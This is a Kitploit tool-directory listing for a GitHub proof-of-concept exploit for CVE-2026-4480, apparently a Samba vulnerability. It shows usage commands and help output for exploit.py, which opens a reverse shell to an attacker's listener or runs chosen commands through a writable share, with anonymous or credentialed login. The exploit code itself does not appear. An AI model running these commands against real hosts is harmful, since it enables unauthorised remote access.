Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-4480-exploit-poc — This is an exploit poc for CVE-2026-4480 | Kitploit
Tools/GitHubGitHub/vusal777/cve-2026-4480-exploit-poc
Payload GenerationVulnerability AnalysisExploitationPenetration TestingCommand and ControlRemote Access Tool
GitHubvusal777/cve-2026-4480-exploit-poc

CVE-2026-4480-exploit-poc

This is an exploit poc for CVE-2026-4480

View Repository
12 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Usage:

For anonymos login:

python3 exploit.py --lhost <listenerhost> --lport <listenerport> -t <target> -N (it is for anonymous login)

Login via credentials:

python3 exploit.py --lhost <listenerhost> --lport <listenerport> -t <target> -u <username> -p <password>

root@kitploit:~
[!] Error: the following arguments are required: -s/--sharename
[*] Note: if user is anonymous and no password, then just add -N without -u or -p

##### Usage:
exploit.py [-h] -t TARGET -Lh LHOST -Lp LPORT -s SHARENAME [-c CMD] (-N | -u USERNAME) [-p PASSWORD]
options:
-h, --help            show this help message and exit
-t, --target TARGET   target Samba host/IP (rhost)
-Lh, --lhost LHOST    your listener IP (e.g. tun0)
-Lp, --lport LPORT    your listener port
-s, --sharename SHARENAME (Writable SMB share / printer name)
-c, --cmd CMD         run a specific shell command instead of a reverse shell
-N, --no-pass         Anonymous / guest login
-u, --username USERNAME (Username for authentication)
-p, --password PASSWORD (Password for authentication)```
Download Tool